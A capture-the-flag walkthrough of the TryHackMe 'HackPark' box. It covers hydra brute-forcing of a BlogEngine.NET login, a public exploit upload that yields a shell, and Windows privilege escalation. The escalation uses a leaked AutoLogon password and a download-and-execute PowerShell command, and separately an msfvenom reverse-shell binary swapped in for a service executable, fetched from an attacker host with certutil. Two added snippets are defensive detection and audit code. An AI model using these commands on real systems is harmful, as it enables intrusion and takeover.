Tryhackme - hackpark (topics: hydra & BlogEngine.NET 3.3.6 & privilege escalation via AutoLogon credentials & privilege escalation via an abnormal service)

1 Scanning

Mainly port 80: go into the web app and gather information.

C:\root> nmap -A 10.10.16.216
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.64 seconds
C:\root> nmap -A 10.10.16.216 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT
Nmap scan report for 10.10.16.216
Host is up (0.27s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  tcpwrapped
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  tcpwrapped
|_ssl-date: 2020-05-26T05:56:29+00:00; +1s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops

2 hydra

Didn't find anything of value.
dirbuster found a login page.
There is no file hinting at account information, and SQL injection looks hard to pull off. Let hydra run and see, and keep gathering other information while waiting for the results.

Tick "keep me logged in", then enter anything.
Capture the request in Burp, then write the hydra command from the captured data. Guess "admin" as the username for now.
I suggest using my command below as a reference.
I tried many times before and could not get a result; it came back with 16 bogus hits, and from the forum it seems many people ran into the same thing.
This one finally worked.

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.16.216 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=d%2B8KY5CoALVVu3cyx1zQBa5HJIO%2B%2BuZdB%2F%2BI60ddHdGPMLjeczLW8wG6%2F3cxgyyj17FxjLlJy7Twjwl9N1TRQeynyuc%2F5RKomk5MP%2FpeLy5wQ2c%2B7weG4x4uHWQiN%2FQF4LIxVWckJ9JJ917ffDnhcNkWhEBiW8q3eZ19lK2WyzCRq7S2DZkFFNMnsXpVs7at1VNHuoutNFwFg%2BVI37N6HIkOx5Qt328mR7vR7ebWV06at%2FS%2BsdWUqSKUoYuhr9OqGbzaUlh%2FnjLqzUm7SFRA1L5C8PIZwaoyXGbiL7eASUHrj8s6vV%2FeiHbGYe5qsDWUSyQ%2BC2n0ElFVOIz403nfU7lhvpxR3XtPJgq5UHAn%2ByWx57H7&__EVENTVALIDATION=1XEVJ1TGaBbiR0C2cHb0tUPm%2F1h0aH5m0aXu8WckU4cPKPYBmRLiAqA2YXBqXGokg%2FhfrQi0VwT0Hq88Tkye8%2B5IB%2FtOYN5QvJ%2Fcr5XMLS4etWgbMuTiY%2FFYogM1B6Rn9WbdAh%2FRXUPQEDcxHvLHDKyyIS09lavR7XBTiUvPVfzqMMDv&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24RememberMe=on&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
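An added detection example from the defender's side (not part of the original writeup): a small Python check over IIS W3C logs that flags the kind of burst the hydra run above produces against /Account/login.aspx. It assumes the default IIS field layout and that BlogEngine answers a failed login with HTTP 200 (which is why hydra has to match the "Login failed" body text), so it counts POST volume per source IP inside a sliding window instead of looking at error status codes; the log lines are constructed, and the User-Agent is assumed to be hydra's default.

```python
"""Flag login brute-force bursts against BlogEngine's /Account/login.aspx in IIS W3C logs."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/account/login.aspx"

# Constructed sample log (not from the box). Every attempt is answered with 200, so the
# status code does not separate failures; the User-Agent is assumed to be hydra's default.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status time-taken
2020-05-26 05:58:01 10.10.16.216 GET /Account/login.aspx ReturnURL=%2fadmin%2f 80 - 10.9.23.70 Mozilla/5.0+(Hydra) 200 120
2020-05-26 05:58:02 10.10.16.216 POST /Account/login.aspx ReturnURL=%2fadmin%2f 80 - 10.9.23.70 Mozilla/5.0+(Hydra) 200 98
2020-05-26 05:58:02 10.10.16.216 POST /Account/login.aspx ReturnURL=%2fadmin%2f 80 - 10.9.23.70 Mozilla/5.0+(Hydra) 200 91
2020-05-26 05:58:03 10.10.16.216 POST /Account/login.aspx ReturnURL=%2fadmin%2f 80 - 10.9.23.70 Mozilla/5.0+(Hydra) 200 102
2020-05-26 05:58:03 10.10.16.216 POST /Account/login.aspx ReturnURL=%2fadmin%2f 80 - 10.9.23.70 Mozilla/5.0+(Hydra) 200 95
2020-05-26 05:58:04 10.10.16.216 POST /Account/login.aspx ReturnURL=%2fadmin%2f 80 - 10.9.23.70 Mozilla/5.0+(Hydra) 200 99
2020-05-26 05:58:04 10.10.16.216 POST /Account/login.aspx ReturnURL=%2fadmin%2f 80 - 10.9.23.70 Mozilla/5.0+(Hydra) 200 97
2020-05-26 05:58:30 10.10.16.216 POST /Account/login.aspx ReturnURL=%2fadmin%2f 80 - 192.0.2.10 Mozilla/5.0+(X11) 200 101
2020-05-26 05:59:10 10.10.16.216 POST /Account/login.aspx ReturnURL=%2fadmin%2f 80 - 192.0.2.10 Mozilla/5.0+(X11) 302 77
"""

def parse_iis_log(text):
    """Yield one dict per request, naming the columns from the #Fields: header line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_login_bursts(text, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: peak count} for IPs with >= threshold login POSTs inside any window."""
    recent = defaultdict(deque)          # per-IP timestamps of recent login POSTs
    flagged = {}
    for req in parse_iis_log(text):
        if req["cs-method"] != "POST" or req["cs-uri-stem"].lower() != LOGIN_PATH:
            continue
        ts = datetime.strptime(req["date"] + " " + req["time"], "%Y-%m-%d %H:%M:%S")
        q = recent[req["c-ip"]]
        q.append(ts)
        while ts - q[0] > window:        # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            flagged[req["c-ip"]] = max(flagged.get(req["c-ip"], 0), len(q))
    return flagged

if __name__ == "__main__":
    for ip, n in find_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {n} login POSTs within 60 s")
```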

Once logged in, the version is visible.

3 BlogEngine.NET 3.3.6

Searching online for related vulnerabilities turns up https://www.exploit-db.com/exploits/46353

After downloading it, rename the file to PostView.ascx.
Change the IP in it to your own.
Then, in the site's admin panel, go to Content > Posts and click New. The site may be very slow and throw errors; just wait.

Continue via the folder icon on the right (the file manager): use Upload to send the exploit file we downloaded and edited.
After it reports success, go back to the previous screen and click Publish on the right; it then confirms the upload.

Once the upload succeeds, request 10.10.16.216/?theme=../../App_Data/files, with a listener open, and you get a shell.

4 Privilege escalation via Windows AutoLogon credentials

This shell shows nothing on the left, which looks odd, but it is usable. I couldn't be bothered to forward it and spawn a fresh shell.
Upload winpeas.exe and run an automated scan.
It shows AutoLogon password information, and it is admin's. Escalate directly. See the Bart box for reference.
The approach is the same; my nishang shell file doesn't even need changing, still that 2.ps1. Just edit the IP and port at the bottom.
I've covered nishang usage plenty of times before, so I won't repeat it here.
The final command needs two small changes: the password, and the hostname, which becomes hackpark this time.

powershell.exe -c "$user='WORKGROUP\administrator'; $pass='4q6XvFES7Fdxs'; try { Invoke-Command -ScriptBlock { iex(New-Object Net.WebClient).DownloadString('http://10.9.23.70/2.ps1') } -ComputerName hackpark -Credential (New-Object System.Management.Automation.PSCredential $user,(ConvertTo-SecureString $pass -AsPlainText -Force)) } catch { echo $_.Exception.Message }" 2>&1

Received. Owned.

5 Privilege escalation via an abnormal service

The other method follows the hint in the room's questions:
the system runs an unusual, suspicious service, and we escalate through it.
My one hour had expired, so I restarted the box and the IP changed.

Look again at the earlier winpeas scan results:
two places flag this directory as suspicious, and we have write permission on it.

Besides the exe, winpeas also has a bat version. Run the bat version as well and compare with the exe results: one difference is the colouring, and the emphasis of the content also seems to differ.

cd /windows/temp
c:\windows\system32\inetsrv>cd /windows/temp
certutil -urlcache -split -f http://10.9.23.70/winPEAS.bat 666.bat
c:\Windows\Temp>certutil -urlcache -split -f http://10.9.23.70/winPEAS.bat 666.bat
****  Online  ****
  0000  ...
  8061
CertUtil: -URLCache command completed successfully.
c:\Windows\Temp\666.bat
c:\Windows\Temp>c:\Windows\Temp\666.bat
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [*] BASIC SYSTEM INFO <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] WINDOWS OS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check for vulnerabilities for the OS version with the applied patches

Among the running services,
wscheduler.exe seems related to the name of that suspicious directory, and there are other rarely seen, suspicious-looking executables such as message; worth keeping an eye on, they may all be useful.

Look inside the suspicious directory: there is a message.exe, matching the suspicious service process found above.
Digging further, the event logs show admin repeatedly starting and stopping message.exe, probably sending a message, closing it, then sending again.
So now it is clear: admin runs this message.exe, and we have write permission on its directory.

Forge a new message.exe that is actually a reverse-shell payload. When admin runs it, it sends us a shell, and that is the privilege escalation.

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.23.70 LPORT=443 -e x86/shikata_ga_nai -f exe -o Message.exe

Rename the old message.exe in the target directory so the duplicate doesn't cause problems.

ren Message.exe Message.bak

Then upload the new Message.exe.

certutil -urlcache -split -f http://10.9.23.70/Message.exe Message.exe

After a while the listener receives the connection. Owned.
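An added audit example from the defender's side (not part of the original writeup): given each service's binary path as `sc qc` reports it, and the `icacls` output for the binary's directory, it lists the services whose directory a low-privilege principal can modify, which is exactly the condition that made the swap above possible. The service names, the path C:\ExampleSched and the icacls output are constructed placeholders, not the box's real values.

```python
"""Audit: which services run from a directory that ordinary users can write to?"""
import ntpath, re

# icacls rights that allow creating or replacing files (simple rights plus specific write rights)
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "DC", "WA", "WEA", "GW", "GA"}
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}
LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users"}

# Constructed input (placeholder names, not the box's real values):
# service name -> BINARY_PATH_NAME as shown by `sc qc <name>`
SERVICES = {
    "ExampleScheduler": r"C:\ExampleSched\WService.exe",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
}
# directory -> raw text of `icacls <directory>` (constructed)
ICACLS = {
    r"C:\ExampleSched": r"""C:\ExampleSched BUILTIN\Users:(OI)(CI)(F)
                NT AUTHORITY\Authenticated Users:(I)(CI)(WD,AD)
                NT AUTHORITY\SYSTEM:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files""",
    r"C:\Windows\System32": r"""C:\Windows\System32 NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                    BUILTIN\Administrators:(OI)(CI)(F)
                    BUILTIN\Users:(OI)(CI)(RX)""",
}

def parse_icacls(path, output):
    """Yield (principal, set of right tokens) for every ACE in `icacls <path>` output."""
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):            # first line carries the path before its first ACE
            line = line[len(path):].strip()
        if ":" not in line or "(" not in line:
            continue                         # blank line or the "Successfully processed" footer
        principal, perms = line.split(":", 1)
        tokens = {t.strip().upper() for g in re.findall(r"\(([^)]*)\)", perms) for t in g.split(",")}
        yield principal, tokens - INHERIT_FLAGS

def writable_service_dirs(services, icacls_outputs):
    """Return [(service, principal, sorted write rights)] where a low-privilege principal can write."""
    findings = []
    for svc, exe in services.items():
        directory = ntpath.dirname(exe)      # ntpath so backslash paths split on any host
        for principal, rights in parse_icacls(directory, icacls_outputs.get(directory, "")):
            hit = rights & WRITE_RIGHTS
            if principal.lower() in LOW_PRIV and hit:
                findings.append((svc, principal, sorted(hit)))
    return findings

if __name__ == "__main__":
    for svc, who, rights in writable_service_dirs(SERVICES, ICACLS):
        print(f"{svc}: {who} has {','.join(rights)} on the binary's directory")
```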